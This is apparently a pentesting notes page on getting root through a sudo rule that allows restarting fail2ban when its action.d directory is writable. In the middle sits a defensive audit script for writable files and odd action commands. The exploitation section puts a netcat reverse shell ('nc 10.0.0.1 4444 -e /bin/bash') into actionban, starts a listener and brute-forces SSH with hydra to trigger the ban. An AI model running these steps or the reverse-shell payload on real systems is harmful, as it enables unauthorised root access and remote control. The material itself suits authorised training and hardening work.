# Sudo Fail2ban Privilege Escalation

**Fail2ban** is an intrusion prevention software framework.\
It protects against brute-force attacks by banning hosts that generate too many failed logins.

### Investigation

```sh
sudo -l

(root) NOPASSWD: /etc/init.d/fail2ban restart
```

If we can restart **fail2ban** as root, we can escalate privileges by modifying its configuration, because the commands in the action files are executed by root when a host is banned.\
We first need to check whether any of the configuration files are writable by us.

```sh
find /etc -writable -ls 2>/dev/null

4 drwxrwx--- 2 root security  4096 Oct 16 08:57 /etc/fail2ban/action.d
```

Look inside of **"/etc/fail2ban/jail.conf"** to know more about how fail2ban is configured.

```sh
less /etc/fail2ban/jail.conf

# ---------------------------------------------

# output

...
# "bantime" is the number of seconds that a host is banned.
bantime  = 10s

# A host is banned if it has generated "maxretry" during the last "findtime"
# seconds.
findtime  = 10s

# "maxretry" is the number of failures before a host get banned.
maxretry = 5
...
```
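The two findings above (a writable path under `/etc/fail2ban` and a sudo rule that lets a user restart the service) are what make this escalation possible, so they are also what an administrator should audit for. The script below is an added example, not part of the original notes: it walks a fail2ban configuration tree, reports anything group- or world-writable, and flags the first line of any `actionstart`, `actionstop`, `actioncheck`, `actionban` or `actionunban` key whose command does not begin with one of fail2ban's stock firewall tools or tags. The `make_demo_tree` helper builds a constructed directory so the audit can be tried without touching a real `/etc/fail2ban`; the file names, the allowlist of tools, and the `/tmp/not-a-firewall-tool` placeholder are all assumptions made for the example.

```sh
#!/bin/sh
# Added audit helper (not from the original notes). Checks a fail2ban config
# tree for the two weaknesses the escalation relies on:
#   1. files or directories that group or others can write
#   2. action.d keys whose command does not start with an expected firewall tool
# Prints one line per finding; returns 0 when clean, 1 when anything was found.
# Only the first line of each key is inspected; multi-line continuation lines
# (indented lines in the stock files) are not examined by this check.
# Usage: audit_fail2ban_dir /etc/fail2ban

audit_fail2ban_dir() {
    dir="$1"
    report=""

    # 1. Permission check: anything group- or world-writable under the tree.
    writable=$(find "$dir" \( -perm -g+w -o -perm -o+w \) 2>/dev/null)
    [ -n "$writable" ] && report="$report$(printf '%s\n' "$writable" | sed 's/^/WRITABLE: /')
"

    # 2. Content check: the command of each action key must begin with an allowed
    #    tool or fail2ban substitution tag (assumed allowlist for this example).
    for conf in "$dir"/action.d/*.conf; do
        [ -f "$conf" ] || continue
        suspicious=$(grep -E '^(actionstart|actionstop|actioncheck|actionban|actionunban)[[:space:]]*=' "$conf" \
            | grep -Ev '^[a-z]+[[:space:]]*=[[:space:]]*(<iptables>|<ip6tables>|<ipset>|<nft>|iptables|ip6tables|ipset|nft|true|$)')
        [ -n "$suspicious" ] && report="$report$(printf '%s\n' "$suspicious" | sed "s#^#SUSPICIOUS: $conf: #")
"
    done

    printf '%s' "$report"
    [ -z "$report" ]
}

# Constructed demo tree (not a real system's config) so the audit can be run
# offline. One stock-like action file plus one weakened file that is
# group-writable and runs an arbitrary program on ban. Prints the directory.
make_demo_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/action.d"
    chmod 755 "$root" "$root/action.d"
    cat > "$root/action.d/iptables-multiport.conf" <<'EOF'
[Definition]
actionstart = <iptables> -N f2b-<name>
actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>
actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>
EOF
    chmod 644 "$root/action.d/iptables-multiport.conf"
    cat > "$root/action.d/weak.conf" <<'EOF'
[Definition]
actionban = /tmp/not-a-firewall-tool <ip>
EOF
    chmod 664 "$root/action.d/weak.conf"
    printf '%s' "$root"
}

# Demo run against the constructed tree; drop these lines to use the file as a library.
demo=$(make_demo_tree)
audit_fail2ban_dir "$demo" || echo "audit: findings reported for $demo"
rm -rf "$demo"
```

On a real host, run `audit_fail2ban_dir /etc/fail2ban` as root and pair it with `sudo -l` for each unprivileged account: a clean tree is only half the picture if a user can still restart the service. Any `WRITABLE:` line under `action.d` should be fixed with root ownership and mode `0644` (directories `0755`), and any `SUSPICIOUS:` line compared against the package's pristine copy of that action file.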


### Exploitation

#### 1. Modify the Configuration File

For privilege escalation, we need to update **"iptables-multiport.conf"**.\
Specifically, insert a payload into one of the following keys, each of which holds a command that fail2ban runs as root.

* **actionstart**
* **actionstop**
* **actioncheck**
* **actionban**
* **actionunban**

Here we update the value of **actionban**, the command fail2ban runs when it bans a host after repeated failed login attempts.\
Copy **iptables-multiport.conf** to the current user's home directory.

```sh
ls -al /etc/fail2ban/action.d/iptables-multiport.conf
# copy this file into the home directory for editing the content
cp /etc/fail2ban/action.d/iptables-multiport.conf ~
```

Now modify the file.

```sh
vim ~/iptables-multiport.conf
```

We insert a reverse shell payload into the **actionban**.

```sh
actionban = /usr/bin/nc 10.0.0.1 4444 -e /bin/bash
```

Then move the modified file back to its original location.

```sh
mv ~/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf
```

To apply the new configuration, restart it as root.

```sh
sudo /etc/init.d/fail2ban restart
```

#### 2. Trigger the Action

Start a listener on the local machine.

```sh
nc -lvnp 4444
```

Try to log in with wrong passwords several times until our host gets banned.\
**hydra** is useful for this.

```sh
hydra -l root -P passwords.txt <target-ip> ssh
```

After a short time, the ban action fires and you will get a root shell on the listener.
